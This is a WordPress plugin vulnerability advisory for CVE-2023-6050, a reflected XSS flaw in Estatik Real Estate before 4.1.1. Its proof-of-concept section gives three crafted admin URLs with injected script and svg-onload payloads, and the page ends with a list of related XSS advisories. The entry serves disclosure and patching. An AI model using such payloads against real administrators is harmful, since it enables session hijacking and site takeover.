Estatik Real Estate Plugin < 4.1.1 – Reflected XSS | CVE 2023-6050 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin):

https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script>

https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby)

https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>

Affects Plugins

Fixed in 4.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

c08e0f24-bd61-4e83-a555-363568cf0e6e

Timeline

Publicly Published

2023-12-25 (about 4 months ago)

Added

2023-12-25 (about 4 months ago)

Last Updated

2023-12-25 (about 4 months ago)

Other

Published

Title

Published

2023-08-10

Title

Business Pro <= 1.10.4 - Reflected XSS

Published

2023-11-07

Title

Direct Checkout – Quick View – Buy Now For WooCommerce < 1.5.9 - Authenticated (Shop manager+) Stored Cross-Site Scripting via Custom CSS Code

Published

2023-10-02

Title

Order Delivery Date for WP e-Commerce <= 1.2 - Admin+ Stored XSS

Published

2021-09-09

Title

Integration of Moneybird for WooCommerce <= 2.1.1 - Reflected Cross-Site Scripting

Published

2022-10-05

Title

WooCommerce Ship to Multiple Addresses < 3.7.2 - Reflected Cross-Site Scripting